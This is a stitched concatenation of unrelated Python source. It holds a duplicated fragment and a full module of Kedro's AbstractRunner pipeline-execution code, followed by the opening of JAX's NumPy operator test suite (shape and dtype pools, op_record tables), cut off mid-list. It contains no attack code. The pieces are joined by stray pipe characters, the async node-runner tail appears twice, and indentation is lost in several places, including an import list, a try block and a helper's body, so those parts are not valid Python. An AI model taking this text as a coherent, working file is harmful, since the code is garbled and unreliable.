            node, catalog, inputs, is_async, hook_manager, session_id=session_id
        )
        inputs.update(additional_inputs)
        outputs = _call_node_run(
            node, catalog, inputs, is_async, hook_manager, session_id=session_id
        )
        save_futures = set()
        for name, data in outputs.items():
            hook_manager.hook.before_dataset_saved(dataset_name=name, data=data)
            save_futures.add(pool.submit(catalog.save, name, data))
        for future in as_completed(save_futures):
            # Re-raise the first failed save; remaining futures are abandoned.
            exception = future.exception()
            if exception:
                raise exception
            # NOTE(review): `name`/`data` are the values left over from the
            # save-submission loop above, not the dataset this future saved —
            # the pylint pragma acknowledges this; confirm intent upstream.
            hook_manager.hook.after_dataset_saved(
                dataset_name=name, data=data  # pylint: disable=undefined-loop-variable
            )
    return node
| """``AbstractRunner`` is the base class for all ``Pipeline`` runner
implementations.
"""
import logging
from abc import ABC, abstractmethod
from concurrent.futures import (
ALL_COMPLETED,
Future,
ThreadPoolExecutor,
as_completed,
wait,
)
from typing import Any, Dict, Iterable
from pluggy import PluginManager
from kedro.framework.hooks.manager import _NullPluginManager
from kedro.io import AbstractDataSet, DataCatalog
from kedro.pipeline import Pipeline
from kedro.pipeline.node import Node
class AbstractRunner(ABC):
    """``AbstractRunner`` is the base class for all ``Pipeline`` runner
    implementations.
    """

    def __init__(self, is_async: bool = False):
        """Instantiates the runner class.

        Args:
            is_async: If True, the node inputs and outputs are loaded and saved
                asynchronously with threads. Defaults to False.
        """
        self._is_async = is_async

    @property
    def _logger(self):
        # Logger named after the concrete runner's module.
        return logging.getLogger(self.__module__)

    def run(
        self,
        pipeline: Pipeline,
        catalog: DataCatalog,
        hook_manager: PluginManager = None,
        session_id: str = None,
    ) -> Dict[str, Any]:
        """Run the ``Pipeline`` using the datasets provided by ``catalog``
        and save results back to the same objects.

        Args:
            pipeline: The ``Pipeline`` to run.
            catalog: The ``DataCatalog`` from which to fetch data.
            hook_manager: The ``PluginManager`` to activate hooks.
            session_id: The id of the session.

        Raises:
            ValueError: Raised when ``Pipeline`` inputs cannot be satisfied.

        Returns:
            Any node outputs that cannot be processed by the ``DataCatalog``.
            These are returned in a dictionary, where the keys are defined
            by the node outputs.
        """
        hook_manager = hook_manager or _NullPluginManager()
        # Copy so default datasets registered below don't mutate the
        # caller's catalog.
        catalog = catalog.shallow_copy()
        unsatisfied = pipeline.inputs() - set(catalog.list())
        if unsatisfied:
            raise ValueError(
                f"Pipeline input(s) {unsatisfied} not found in the DataCatalog"
            )
        # Outputs without a catalog entry are loaded back and returned
        # to the caller at the end of the run.
        free_outputs = pipeline.outputs() - set(catalog.list())
        unregistered_ds = pipeline.data_sets() - set(catalog.list())
        for ds_name in unregistered_ds:
            catalog.add(ds_name, self.create_default_data_set(ds_name))
        if self._is_async:
            self._logger.info(
                "Asynchronous mode is enabled for loading and saving data"
            )
        self._run(pipeline, catalog, hook_manager, session_id)
        self._logger.info("Pipeline execution completed successfully.")
        return {ds_name: catalog.load(ds_name) for ds_name in free_outputs}

    def run_only_missing(
        self, pipeline: Pipeline, catalog: DataCatalog, hook_manager: PluginManager
    ) -> Dict[str, Any]:
        """Run only the missing outputs from the ``Pipeline`` using the
        datasets provided by ``catalog``, and save results back to the
        same objects.

        Args:
            pipeline: The ``Pipeline`` to run.
            catalog: The ``DataCatalog`` from which to fetch data.
            hook_manager: The ``PluginManager`` to activate hooks.

        Raises:
            ValueError: Raised when ``Pipeline`` inputs cannot be
                satisfied.

        Returns:
            Any node outputs that cannot be processed by the
            ``DataCatalog``. These are returned in a dictionary, where
            the keys are defined by the node outputs.
        """
        free_outputs = pipeline.outputs() - set(catalog.list())
        missing = {ds for ds in catalog.list() if not catalog.exists(ds)}
        to_build = free_outputs | missing
        # Rerun the nodes that produce the missing data, plus everything
        # downstream of them.
        to_rerun = pipeline.only_nodes_with_outputs(*to_build) + pipeline.from_inputs(
            *to_build
        )
        # We also need any missing datasets that are required to run the
        # `to_rerun` pipeline, including any chains of missing datasets.
        unregistered_ds = pipeline.data_sets() - set(catalog.list())
        output_to_unregistered = pipeline.only_nodes_with_outputs(*unregistered_ds)
        input_from_unregistered = to_rerun.inputs() & unregistered_ds
        to_rerun += output_to_unregistered.to_outputs(*input_from_unregistered)
        return self.run(to_rerun, catalog, hook_manager)

    @abstractmethod  # pragma: no cover
    def _run(
        self,
        pipeline: Pipeline,
        catalog: DataCatalog,
        hook_manager: PluginManager,
        session_id: str = None,
    ) -> None:
        """The abstract interface for running pipelines, assuming that the
        inputs have already been checked and normalized by run().

        Args:
            pipeline: The ``Pipeline`` to run.
            catalog: The ``DataCatalog`` from which to fetch data.
            hook_manager: The ``PluginManager`` to activate hooks.
            session_id: The id of the session.
        """
        pass

    @abstractmethod  # pragma: no cover
    def create_default_data_set(self, ds_name: str) -> AbstractDataSet:
        """Factory method for creating the default dataset for the runner.

        Args:
            ds_name: Name of the missing dataset.

        Returns:
            An instance of an implementation of ``AbstractDataSet`` to be
            used for all unregistered datasets.
        """
        pass

    def _suggest_resume_scenario(
        self, pipeline: Pipeline, done_nodes: Iterable[Node]
    ) -> None:
        # Log a hint telling the user how to resume a partially-failed run.
        remaining_nodes = set(pipeline.nodes) - set(done_nodes)
        postfix = ""
        if done_nodes:
            node_names = (n.name for n in remaining_nodes)
            resume_p = pipeline.only_nodes(*node_names)
            # Restart from the nodes whose inputs are free pipeline inputs.
            start_p = resume_p.only_nodes_with_inputs(*resume_p.inputs())
            start_node_names = (n.name for n in start_p.nodes)
            postfix += f" --from-nodes \"{','.join(start_node_names)}\""
        self._logger.warning(
            "There are %d nodes that have not run.\n"
            "You can resume the pipeline run by adding the following "
            "argument to your previous command:\n%s",
            len(remaining_nodes),
            postfix,
        )
def run_node(
    node: Node,
    catalog: DataCatalog,
    hook_manager: PluginManager,
    is_async: bool = False,
    session_id: str = None,
) -> Node:
    """Execute one ``Node``, reading inputs from and writing outputs to `catalog`.

    Args:
        node: The ``Node`` to run.
        catalog: A ``DataCatalog`` holding the node's inputs and outputs.
        hook_manager: The ``PluginManager`` used to fire hooks.
        is_async: When True, inputs/outputs are loaded and saved on threads.
            Defaults to False.
        session_id: The session id of the pipeline run.

    Returns:
        The node argument.
    """
    runner = _run_node_async if is_async else _run_node_sequential
    node = runner(node, catalog, hook_manager, session_id)
    for confirmed_name in node.confirms:
        catalog.confirm(confirmed_name)
    return node
def _collect_inputs_from_hook(
    node: Node,
    catalog: DataCatalog,
    inputs: Dict[str, Any],
    is_async: bool,
    hook_manager: PluginManager,
    session_id: str = None,
) -> Dict[str, Any]:
    """Invoke ``before_node_run`` hooks and merge any extra inputs they return."""
    # pylint: disable=too-many-arguments
    inputs = inputs.copy()  # shallow copy so hooks cannot mutate the caller's dict
    hook_response = hook_manager.hook.before_node_run(
        node=node,
        catalog=catalog,
        inputs=inputs,
        is_async=is_async,
        session_id=session_id,
    )
    additional_inputs: Dict[str, Any] = {}
    # A _NullPluginManager returns None rather than a list of hook results.
    if hook_response is None:
        return additional_inputs
    for response in hook_response:
        if response is None:
            continue
        if not isinstance(response, dict):
            response_type = type(response).__name__
            raise TypeError(
                f"'before_node_run' must return either None or a dictionary mapping "
                f"dataset names to updated values, got '{response_type}' instead."
            )
        additional_inputs.update(response)
    return additional_inputs
def _call_node_run(
    node: Node,
    catalog: DataCatalog,
    inputs: Dict[str, Any],
    is_async: bool,
    hook_manager: PluginManager,
    session_id: str = None,
) -> Dict[str, Any]:
    """Run ``node.run``, firing error/after hooks; return the node's outputs."""
    # pylint: disable=too-many-arguments
    # The two hook calls share the same context keywords; build them once.
    hook_kwargs = dict(
        node=node,
        catalog=catalog,
        inputs=inputs,
        is_async=is_async,
        session_id=session_id,
    )
    try:
        outputs = node.run(inputs)
    except Exception as exc:
        # Let hooks observe the failure before re-raising it unchanged.
        hook_manager.hook.on_node_error(error=exc, **hook_kwargs)
        raise exc
    hook_manager.hook.after_node_run(outputs=outputs, **hook_kwargs)
    return outputs
def _run_node_sequential(
    node: Node,
    catalog: DataCatalog,
    hook_manager: PluginManager,
    session_id: str = None,
) -> Node:
    """Load inputs, run the node, and save outputs — all on the calling thread."""
    is_async = False
    inputs = {}
    for input_name in node.inputs:
        hook_manager.hook.before_dataset_loaded(dataset_name=input_name)
        loaded = catalog.load(input_name)
        hook_manager.hook.after_dataset_loaded(dataset_name=input_name, data=loaded)
        inputs[input_name] = loaded
    # Hooks may contribute or override inputs before the node executes.
    inputs.update(
        _collect_inputs_from_hook(
            node, catalog, inputs, is_async, hook_manager, session_id=session_id
        )
    )
    outputs = _call_node_run(
        node, catalog, inputs, is_async, hook_manager, session_id=session_id
    )
    for output_name, value in outputs.items():
        hook_manager.hook.before_dataset_saved(dataset_name=output_name, data=value)
        catalog.save(output_name, value)
        hook_manager.hook.after_dataset_saved(dataset_name=output_name, data=value)
    return node
def _run_node_async(
    node: Node,
    catalog: DataCatalog,
    hook_manager: PluginManager,
    session_id: str = None,
) -> Node:
    """Run a single node with inputs loaded and outputs saved on a thread pool.

    Args:
        node: The ``Node`` to run.
        catalog: A ``DataCatalog`` containing the node's inputs and outputs.
        hook_manager: The ``PluginManager`` to activate hooks.
        session_id: The session id of the pipeline run.

    Returns:
        The node argument.
    """
    def _synchronous_dataset_load(dataset_name: str):
        """Minimal wrapper to ensure Hooks are run synchronously
        within an asynchronous dataset load."""
        hook_manager.hook.before_dataset_loaded(dataset_name=dataset_name)
        return_ds = catalog.load(dataset_name)
        hook_manager.hook.after_dataset_loaded(
            dataset_name=dataset_name, data=return_ds
        )
        return return_ds

    with ThreadPoolExecutor() as pool:
        # Submit all input loads concurrently, then block until every future
        # resolves before materializing the results into plain values.
        inputs: Dict[str, Future] = {}
        for name in node.inputs:
            inputs[name] = pool.submit(_synchronous_dataset_load, name)
        wait(inputs.values(), return_when=ALL_COMPLETED)
        inputs = {key: value.result() for key, value in inputs.items()}
        is_async = True
        additional_inputs = _collect_inputs_from_hook(
            node, catalog, inputs, is_async, hook_manager, session_id=session_id
        )
        inputs.update(additional_inputs)
        outputs = _call_node_run(
            node, catalog, inputs, is_async, hook_manager, session_id=session_id
        )
        save_futures = set()
        for name, data in outputs.items():
            hook_manager.hook.before_dataset_saved(dataset_name=name, data=data)
            save_futures.add(pool.submit(catalog.save, name, data))
        for future in as_completed(save_futures):
            # Re-raise the first failed save; remaining futures are abandoned.
            exception = future.exception()
            if exception:
                raise exception
            # NOTE(review): `name`/`data` are the values left over from the
            # save-submission loop above, not the dataset this future saved —
            # the pylint pragma acknowledges this; confirm intent upstream.
            hook_manager.hook.after_dataset_saved(
                dataset_name=name, data=data  # pylint: disable=undefined-loop-variable
            )
    return node
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import functools
from functools import partial
import inspect
import itertools
import operator
from typing import cast, Iterator, Optional, List, Tuple
import unittest
from unittest import SkipTest
import warnings
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
try:
import numpy_dispatch
except ImportError:
numpy_dispatch = None
import jax
import jax.ops
from jax._src import api
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax._src import dtypes
from jax import tree_util
from jax.interpreters import xla
from jax.test_util import check_grads
from jax._src.util import prod
from jax._src.numpy.util import _parse_numpydoc, ParsedDoc
from jax.config import config
config.parse_flags_with_absl()
FLAGS = config.FLAGS
numpy_version = tuple(map(int, np.__version__.split('.')[:3]))

# Shape pools used to parametrize the operator tests below.
nonempty_nonscalar_array_shapes = [(4,), (3, 4), (3, 1), (1, 4), (2, 1, 4), (2, 3, 4)]
nonempty_array_shapes = [()] + nonempty_nonscalar_array_shapes
one_dim_array_shapes = [(1,), (6,), (12,)]
empty_array_shapes = [(0,), (0, 4), (3, 0),]

scalar_shapes = [jtu.NUMPY_SCALAR_SHAPE, jtu.PYTHON_SCALAR_SHAPE]
array_shapes = nonempty_array_shapes + empty_array_shapes
nonzerodim_shapes = nonempty_nonscalar_array_shapes + empty_array_shapes
nonempty_shapes = scalar_shapes + nonempty_array_shapes
all_shapes = scalar_shapes + array_shapes

# Dtype pools, grouped by numeric category.
float_dtypes = jtu.dtypes.all_floating
complex_dtypes = jtu.dtypes.complex
int_dtypes = jtu.dtypes.all_integer
unsigned_dtypes = jtu.dtypes.all_unsigned
bool_dtypes = jtu.dtypes.boolean
default_dtypes = float_dtypes + int_dtypes
inexact_dtypes = float_dtypes + complex_dtypes
number_dtypes = float_dtypes + complex_dtypes + int_dtypes
all_dtypes = number_dtypes + bool_dtypes

python_scalar_dtypes = [jnp.bool_, jnp.int_, jnp.float_, jnp.complex_]

# uint64 is problematic because with any uint type it promotes to float:
int_dtypes_no_uint64 = [d for d in int_dtypes + unsigned_dtypes if d != np.uint64]
def _valid_dtypes_for_shape(shape, dtypes):
    """Filter *dtypes* down to those representable for *shape*.

    Python scalars only have one type in each category (float, bool, etc.),
    so the Python-scalar pseudo-shape restricts the pool to scalar types.
    """
    if shape is not jtu.PYTHON_SCALAR_SHAPE:
        return dtypes
    return [dtype for dtype in dtypes if dtype in python_scalar_dtypes]
def _shape_and_dtypes(shapes, dtypes):
    """Yield every valid (shape, dtype) pairing from the two pools."""
    for shape in shapes:
        valid_dtypes = _valid_dtypes_for_shape(shape, dtypes)
        for dtype in valid_dtypes:
            yield shape, dtype
def _compatible_shapes(shape):
    """Return shapes broadcast-compatible with *shape*: its trailing suffixes."""
    # Scalars (and zero-dim shapes) are only compatible with themselves.
    if shape in scalar_shapes or np.ndim(shape) == 0:
        return [shape]
    num_suffixes = len(shape) + 1
    return (shape[start:] for start in range(num_suffixes))
def _get_y_shapes(y_dtype, shape, rowvar):
# Helper function for testCov.
if y_dtype is None:
return [None]
if len(shape) == 1:
return [shape]
elif rowvar or shape[0] == 1:
return [(1, shape[-1]), (2, shape[-1]), (5, shape[-1])]
return [(shape[0], 1), (shape[0], 2), (shape[0], 5)]
# Description of a single numpy operator test case.
OpRecord = collections.namedtuple(
    "OpRecord",
    ["name", "nargs", "dtypes", "shapes", "rng_factory", "diff_modes",
     "test_name", "check_dtypes", "tolerance", "inexact"])


def op_record(name, nargs, dtypes, shapes, rng_factory, diff_modes,
              test_name=None, check_dtypes=True,
              tolerance=None, inexact=False):
    """Build an OpRecord, defaulting test_name to the operator name."""
    return OpRecord(name, nargs, dtypes, shapes, rng_factory, diff_modes,
                    test_name or name, check_dtypes, tolerance, inexact)
# Ops whose jnp implementation maps one-to-one onto the NumPy function of the
# same name; each is checked against that NumPy function by testOp.
JAX_ONE_TO_ONE_OP_RECORDS = [
    op_record("abs", 1, number_dtypes + unsigned_dtypes + bool_dtypes,
              all_shapes, jtu.rand_default, ["rev"]),
    op_record("add", 2, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("ceil", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("ceil", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("conj", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("exp", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    op_record("fabs", 1, float_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("float_power", 2, inexact_dtypes, all_shapes,
              partial(jtu.rand_default, scale=1), ["rev"],
              tolerance={jnp.bfloat16: 1e-2, np.float32: 1e-3,
                         np.float64: 1e-12, np.complex64: 2e-4,
                         np.complex128: 1e-12}, check_dtypes=False),
    op_record("floor", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("floor", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("greater", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("greater_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("i0", 1, float_dtypes, all_shapes, jtu.rand_default, [],
              check_dtypes=False),
    op_record("ldexp", 2, int_dtypes, all_shapes, jtu.rand_default, [], check_dtypes=False),
    op_record("less", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("less_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
    op_record("log", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              inexact=True),
    op_record("logical_and", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
    op_record("logical_not", 1, all_dtypes, all_shapes, jtu.rand_bool, []),
    op_record("logical_or", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
    op_record("logical_xor", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
    op_record("maximum", 2, all_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("minimum", 2, all_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("multiply", 2, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("negative", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("nextafter", 2, [f for f in float_dtypes if f != jnp.bfloat16],
              all_shapes, jtu.rand_default, ["rev"], inexact=True, tolerance=0),
    op_record("not_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
    op_record("array_equal", 2, number_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
    op_record("array_equiv", 2, number_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
    op_record("reciprocal", 1, inexact_dtypes, all_shapes, jtu.rand_default, []),
    op_record("subtract", 2, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("signbit", 1, default_dtypes + bool_dtypes, all_shapes,
              jtu.rand_some_inf_and_nan, ["rev"]),
    op_record("trunc", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("trunc", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_some_inf_and_nan, [], check_dtypes=False),
    op_record("sin", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    op_record("cos", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    op_record("tan", 1, number_dtypes, all_shapes,
              partial(jtu.rand_uniform, low=-1.5, high=1.5), ["rev"],
              inexact=True),
    op_record("sinh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    op_record("cosh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True),
    # TODO(b/142975473): on CPU, tanh for complex128 is only accurate to
    # ~float32 precision.
    # TODO(b/143135720): on GPU, tanh has only ~float32 precision.
    op_record("tanh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              tolerance={np.float64: 1e-7, np.complex128: 1e-7},
              inexact=True),
    op_record("arcsin", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True),
    op_record("arccos", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True),
    op_record("arctan", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True),
    op_record("arctan2", 2, float_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True),
    op_record("arcsinh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True, tolerance={np.complex64: 2E-4, np.complex128: 2E-14}),
    op_record("arccosh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              inexact=True, tolerance={np.complex64: 2E-2, np.complex128: 2E-12}),
    op_record("arctanh", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
              inexact=True, tolerance={np.float64: 1e-9}),
]
# Ops whose implementation is more involved than a direct one-to-one mapping
# onto a single NumPy primitive; still checked against NumPy by testOp.
JAX_COMPOUND_OP_RECORDS = [
    # angle has inconsistent 32/64-bit return types across numpy versions.
    op_record("angle", 1, number_dtypes, all_shapes, jtu.rand_default, [],
              check_dtypes=False, inexact=True),
    op_record("atleast_1d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("atleast_2d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("atleast_3d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
    op_record("cbrt", 1, default_dtypes, all_shapes, jtu.rand_some_inf, ["rev"],
              inexact=True),
    op_record("conjugate", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("deg2rad", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("divide", 2, number_dtypes, all_shapes, jtu.rand_nonzero, ["rev"],
              inexact=True),
    op_record("divmod", 2, int_dtypes + float_dtypes, all_shapes,
              jtu.rand_nonzero, []),
    op_record("exp2", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
              tolerance={jnp.bfloat16: 4e-2, np.float16: 1e-2}, inexact=True),
    # TODO(b/142975473): on CPU, expm1 for float64 is only accurate to ~float32
    # precision.
    op_record("expm1", 1, number_dtypes, all_shapes, jtu.rand_positive, [],
              test_name="expm1_large", tolerance={np.float64: 1e-8}, inexact=True),
    op_record("expm1", 1, number_dtypes, all_shapes, jtu.rand_small_positive,
              [], tolerance={np.float64: 1e-8}, inexact=True),
    op_record("fix", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("fix", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("floor_divide", 2, number_dtypes, all_shapes,
              jtu.rand_nonzero, ["rev"]),
    op_record("floor_divide", 2, unsigned_dtypes, all_shapes,
              jtu.rand_nonzero, ["rev"]),
    op_record("fmin", 2, number_dtypes, all_shapes, jtu.rand_some_nan, []),
    op_record("fmax", 2, number_dtypes, all_shapes, jtu.rand_some_nan, []),
    op_record("fmod", 2, default_dtypes, all_shapes, jtu.rand_some_nan, []),
    op_record("heaviside", 2, default_dtypes, all_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("hypot", 2, default_dtypes, all_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("kron", 2, number_dtypes, nonempty_shapes, jtu.rand_default, []),
    op_record("outer", 2, number_dtypes, all_shapes, jtu.rand_default, []),
    op_record("imag", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("iscomplex", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("isfinite", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isinf", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isnan", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isneginf", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isposinf", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
    op_record("isreal", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("isrealobj", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("log2", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              inexact=True),
    op_record("log10", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              inexact=True),
    op_record("log1p", 1, number_dtypes, all_shapes, jtu.rand_positive, [],
              test_name="log1p_large", tolerance={np.float64: 1e-12},
              inexact=True),
    op_record("log1p", 1, number_dtypes, all_shapes, jtu.rand_small_positive, [],
              tolerance={np.float64: 1e-12}, inexact=True),
    op_record("logaddexp", 2, float_dtypes, all_shapes,
              jtu.rand_some_inf_and_nan, ["rev"],
              tolerance={np.float64: 1e-12}, inexact=True),
    op_record("logaddexp2", 2, float_dtypes, all_shapes,
              jtu.rand_some_inf_and_nan, ["rev"],
              tolerance={np.float16: 1e-2, np.float64: 2e-14}, inexact=True),
    op_record("polyval", 2, number_dtypes, nonempty_nonscalar_array_shapes,
              jtu.rand_default, [], check_dtypes=False,
              tolerance={dtypes.bfloat16: 4e-2, np.float16: 1e-2,
                         np.float64: 1e-12}),
    op_record("positive", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("power", 2, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              tolerance={np.complex128: 1e-14}, check_dtypes=False),
    op_record("rad2deg", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("ravel", 1, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("real", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
    op_record("remainder", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
              tolerance={np.float16: 1e-2}),
    op_record("mod", 2, default_dtypes, all_shapes, jtu.rand_nonzero, []),
    op_record("modf", 1, float_dtypes, all_shapes, jtu.rand_default, []),
    op_record("modf", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("rint", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan,
              []),
    op_record("rint", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_default, [], check_dtypes=False),
    op_record("sign", 1, number_dtypes + unsigned_dtypes,
              all_shapes, jtu.rand_some_inf_and_nan, []),
    # numpy 1.16 has trouble mixing uint and bfloat16, so we test these separately.
    op_record("copysign", 2, default_dtypes,
              all_shapes, jtu.rand_some_inf_and_nan, [], check_dtypes=False),
    op_record("copysign", 2, unsigned_dtypes,
              all_shapes, jtu.rand_some_inf_and_nan, [], check_dtypes=False),
    op_record("sinc", 1, [t for t in number_dtypes if t != jnp.bfloat16],
              all_shapes, jtu.rand_default, ["rev"],
              tolerance={np.complex64: 1e-5}, inexact=True,
              check_dtypes=False),
    op_record("square", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
    op_record("sqrt", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
              inexact=True),
    op_record("transpose", 1, all_dtypes, all_shapes, jtu.rand_default, ["rev"],
              check_dtypes=False),
    op_record("true_divide", 2, all_dtypes, all_shapes, jtu.rand_nonzero,
              ["rev"], inexact=True),
    op_record("ediff1d", 3, [np.int32], all_shapes, jtu.rand_default, []),
    # TODO(phawkins): np.unwrap does not correctly promote its default period
    # argument under NumPy 1.21 for bfloat16 inputs. It works fine if we
    # explicitly pass a bfloat16 value that does not need promotion. We should
    # probably add a custom test harness for unwrap that tests the period
    # argument anyway.
    op_record("unwrap", 1, [t for t in float_dtypes if t != dtypes.bfloat16],
              nonempty_nonscalar_array_shapes,
              jtu.rand_default, ["rev"],
              # numpy.unwrap always returns float64
              check_dtypes=False,
              # numpy cumsum is inaccurate, see issue #3517
              tolerance={dtypes.bfloat16: 1e-1, np.float16: 1e-1}),
    op_record("isclose", 2, [t for t in all_dtypes if t != jnp.bfloat16],
              all_shapes, jtu.rand_small_positive, []),
    op_record("gcd", 2, int_dtypes_no_uint64, all_shapes, jtu.rand_default, []),
    op_record("lcm", 2, int_dtypes_no_uint64, all_shapes, jtu.rand_default, []),
]
# Integer bitwise ops, compared elementwise against NumPy by testBitwiseOp.
JAX_BITWISE_OP_RECORDS = [
    op_record("bitwise_and", 2, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
    op_record("bitwise_not", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
    op_record("invert", 1, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
    op_record("bitwise_or", 2, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
    op_record("bitwise_xor", 2, int_dtypes + unsigned_dtypes, all_shapes,
              jtu.rand_bool, []),
]
# Reductions that accept a `dtype` argument; driven by testReducer.
JAX_REDUCER_RECORDS = [
    op_record("mean", 1, number_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("prod", 1, all_dtypes, all_shapes, jtu.rand_small_positive, []),
    op_record("sum", 1, all_dtypes, all_shapes, jtu.rand_default, []),
    op_record("nanmean", 1, inexact_dtypes, nonempty_shapes, jtu.rand_some_nan,
              [], inexact=True),
    op_record("nanprod", 1, all_dtypes, all_shapes, jtu.rand_some_nan, []),
    op_record("nansum", 1, number_dtypes, all_shapes, jtu.rand_some_nan, []),
]
# Reductions that accept an `initial` argument; driven by testReducerInitial.
JAX_REDUCER_INITIAL_RECORDS = [
    op_record("prod", 1, all_dtypes, all_shapes, jtu.rand_small_positive, []),
    op_record("sum", 1, all_dtypes, all_shapes, jtu.rand_default, []),
    op_record("max", 1, all_dtypes, all_shapes, jtu.rand_default, []),
    op_record("min", 1, all_dtypes, all_shapes, jtu.rand_default, []),
]
# Reductions that accept `where=` but no `initial` argument.
JAX_REDUCER_WHERE_NO_INITIAL_RECORDS = [
    op_record("all", 1, bool_dtypes, all_shapes, jtu.rand_some_zero, []),
    op_record("any", 1, bool_dtypes, all_shapes, jtu.rand_some_zero, []),
    op_record("mean", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("var", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
    op_record("std", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
]
# Reductions that take no `dtype` argument; driven by testReducerNoDtype.
JAX_REDUCER_NO_DTYPE_RECORDS = [
    op_record("all", 1, all_dtypes, all_shapes, jtu.rand_some_zero, []),
    op_record("any", 1, all_dtypes, all_shapes, jtu.rand_some_zero, []),
    op_record("max", 1, all_dtypes, nonempty_shapes, jtu.rand_default, []),
    op_record("min", 1, all_dtypes, nonempty_shapes, jtu.rand_default, []),
    op_record("var", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
              inexact=True),
